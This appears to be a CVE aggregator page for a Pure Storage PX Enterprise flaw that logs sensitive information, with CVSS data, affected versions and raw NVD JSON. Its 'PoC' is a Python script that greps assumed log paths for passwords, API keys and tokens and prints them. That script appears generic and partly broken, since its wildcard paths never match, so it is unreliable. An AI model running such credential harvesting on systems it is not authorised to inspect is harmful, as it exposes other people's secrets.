Security Vulnerability Report
中文
CVE-2025-9127 CVSS 5.5 MEDIUM

CVE-2025-9127

Published: 2025-12-04 18:15:52
Last Modified: 2026-02-03 16:57:24

Description

A vulnerability exists in PX Enterprise whereby sensitive information may be logged under specific conditions.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:purestorage:portworx:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:purestorage:portworx:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:purestorage:portworx:*:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:purestorage:portworx:2.13.12:*:*:*:enterprise:*:*:* - VULNERABLE
cpe:2.3:a:purestorage:portworx:3.3.0:*:*:*:enterprise:*:*:* - VULNERABLE
Pure Storage PX Enterprise - 所有在特定条件下记录敏感信息的版本
建议联系Pure Storage官方获取具体受影响版本列表

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9127 PoC - Pure Storage PX Enterprise Sensitive Information Logging # This PoC demonstrates how to search for sensitive information in logs import os import re import sys def search_sensitive_logs(log_paths): """ Search for sensitive information in PX Enterprise logs Common sensitive patterns to look for: - Passwords and credentials - API keys and tokens - Private keys - Database connection strings - Authentication tokens """ sensitive_patterns = [ r'password[=:]\s*["\']?(\w+)["\']?', r'api[_-]?key[=:]\s*["\']?([a-zA-Z0-9_-]+)["\']?', r'token[=:]\s*["\']?([a-zA-Z0-9_.-]+)["\']?', r'secret[=:]\s*["\']?(\w+)["\']?', r'credential[=:]\s*["\']?(\w+)["\']?', ] findings = [] for log_path in log_paths: if not os.path.exists(log_path): continue try: with open(log_path, 'r', encoding='utf-8', errors='ignore') as f: for line_num, line in enumerate(f, 1): for pattern in sensitive_patterns: if re.search(pattern, line, re.IGNORECASE): findings.append({ 'file': log_path, 'line': line_num, 'content': line.strip() }) except Exception as e: print(f"Error reading {log_path}: {e}") return findings # Common PX Enterprise log locations default_log_paths = [ '/var/log/pure/px-enterprise.log', '/var/log/pure/px.log', '/opt/purestorage/px/logs/*.log', 'C:\\Program Files\\PureStorage\\PX\\logs\\*.log' ] if __name__ == '__main__': print("CVE-2025-9127 - Sensitive Information in Logs Scanner") print("=" * 50) findings = search_sensitive_logs(default_log_paths) if findings: print(f"Found {len(findings)} potential sensitive information leaks:") for finding in findings: print(f"\n[{finding['file']}:{finding['line']}]") print(finding['content']) else: print("No obvious sensitive information found in logs")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9127", "sourceIdentifier": "[email protected]", "published": "2025-12-04T18:15:51.603", "lastModified": "2026-02-03T16:57:24.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in PX Enterprise whereby sensitive information may be logged under specific conditions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:purestorage:portworx:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "3.1.1", "versionEndExcluding": "3.1.9", "matchCriteriaId": "005E0BD2-5900-420C-B030-CEF1EC0E002C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:purestorage:portworx:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "3.2.0", "versionEndExcluding": "3.2.4", "matchCriteriaId": "CC3EB650-85F4-4853-A306-3C26B955FDBF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:purestorage:portworx:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "3.3.1", "versionEndExcluding": "3.3.1.3", "matchCriteriaId": "C833EB90-87CC-4933-8A7B-FFA9302B0407"}, {"vulnerable": true, "criteria": "cpe:2.3:a:purestorage:portworx:2.13.12:*:*:*:enterprise:*:*:*", "matchCriteriaId": "CF1345AC-4EC6-4EF1-A74E-83D6921E9520"}, {"vulnerable": true, "criteria": "cpe:2.3:a:purestorage:portworx:3.3.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "FCC105BC-CE14-45C8-93DB-BAA2E18BC7F0"}]}]}], "references": [{"url": "https://support.purestorage.com/category/m_pure_storage_product_security", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}